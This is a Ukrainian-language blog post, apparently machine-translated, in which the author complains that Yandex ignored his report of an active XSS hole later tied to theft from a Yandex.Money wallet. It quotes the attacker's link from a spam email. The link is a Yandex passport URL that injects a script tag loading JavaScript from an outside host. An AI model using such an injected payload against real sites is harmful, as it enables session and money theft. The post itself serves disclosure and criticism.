Як наш улюблений яндекс реагує на повідомлення про xss - 13 Березня 2011

Мій сайт

Головна » 2011 » Березень » 13 » Як наш улюблений яндекс реагує на повідомлення про xss

13:01 Як наш улюблений яндекс реагує на повідомлення про xss
Навіяно вчорашнім топиком Як повели мої гроші з гаманця Яндекса. Частина 3. XSS Маленьке передмову тим, хто не читав той пост. У людини вкрали гроші з його гаманця на Яндекс.Деньги. Розбираючись у всій цій неприємній історії, користувач переконується, що Яндекс не всесильний і у них на сайті є чудова XSS. Прочитавши про це, я, скажімо м'яко, трохи здивувався, але не від того, що раптом активна XSS і раптом у такої великої компанії, як яндекс ... ні, не від цього. Здивувався я тому, що особисто повідомляв у компанію про цю дірку 20 днів назад і мені сказали, що заходи застосуємо ASAP. Читати далі ... Лінк на ворожий скрипт був 100% той же самий. Мій лист в яндекс йшлося: SUBJ: Схоже на дірку XSS на вашому сайті Добрий вечір. Тільки що мені прийшов спам і при переході за посиланням всередині листа, я виявив код такого виду: src = 'http://passport.yandex.ru/passport?mode=mycookie&submode = choice & retpath = http://slovari.yandex.ru/% 22 <script> alert () </ script>% 3Cscript type = text / javascript src = http://httpz.ru/zakazchikgo. js> </ script> "' Все це нагадує активну XSS - я сам не перевіряв, але за структурою схоже) через 2 ДНЯ мені приходить від яндекса ось такий відповідь, Ми не проводили подібних розсилок і не маємо до цієї акції ніякого відношення. Це шахраї, які намагаються виманити у Вас гроші або заволодіти реєстраційними даними. Перешліть, будь ласка, це шахрайське лист нам кнопкою «Переслати». Не забудьте поставити галочку «Додати вихідне лист в вигляді вкладення». для тих, хто не в курсі - це шаблонна відмазка, яку яндекс шлють всім, хто скаржиться на спам. Я написав їм повторно і попросив розкрити очі. відповідь вже був більш адекватним: Здравствуйте, Роман! Вибачте, я Вас не зовсім зрозумів і відразу хочу вибачитися за те , що відповіли через дві доби. Даний код був переданий службі безпеки. Вони вживуть заходів. Дякуємо за Ваш лист. Листування ця датується 20-м жовтня. Номер тікета: Ticket # 200910199001067 Вибачте, але для компанії, яка розпоряджається чужими грошима (маю на увазі yandex.money), таке распіздяйство ставлення до питань безпеки просто неприпустимо. PS Окремо хочу сказати, що не дивлячись ні на що, особисто я відчуваю повагу до Яндексу, адже продовжувати активно розвиватися на ринку, де 95% аналогічних компаній у світовому масштабі вже пішли в небуття - це дійсно заслуговує поваги.
1 2 3 4 5 Переглядів: 486 \| Додав: w1zard \| Рейтинг: 0.0/0